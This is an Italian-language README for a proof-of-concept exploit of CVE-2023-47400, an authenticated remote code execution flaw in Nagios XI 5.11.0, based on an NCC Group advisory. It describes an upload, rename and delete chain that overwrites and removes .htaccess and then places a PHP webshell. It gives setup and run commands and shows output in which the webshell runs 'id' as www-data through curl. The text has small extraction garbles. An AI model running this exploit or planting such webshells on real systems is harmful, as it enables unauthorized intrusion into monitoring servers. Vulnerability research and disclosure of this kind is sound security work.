
Prova di concetto per CVE-2023-47400
Prova di concetto per la CVE-2023-47400
Esecuzione remota di codice PHP autenticata tramite scrittura arbitraria di file su Nagios XI 5.11.0
[!Note] Questa PoC si basa sull'advisory tecnico pubblicato da NCC group https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
Questa PoC segue questo processo:
placeholder.jpg (solo header di magic bytes JFIF, nessun contenuto)rename di Custom Includes per rinominare l'immagine in .htaccess (che ha l'effetto di sovrascrivere il file .htaccess esistente)delete di Custom Includes per eliminare il file .htaccess.jpg.php)Lo sfruttamento di questa vulnerabilità porta all'esecuzione remota di codice sull'host nagiosXI, bypassando i filtri di upload dei file (tramite i filtri sulla firma del file e sull'estensione del file) e la prevenzione dell'esecuzione di PHP (tramite ).
.htaccess[!Warning] Questo exploit cancella il file
<NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccesspresente sull'host per consentire l'esecuzione di codice PHP!
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
personalizzare il payload PHP da inserire nella cartella di upload delle immagini
eseguire lo script dell'exploit:
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)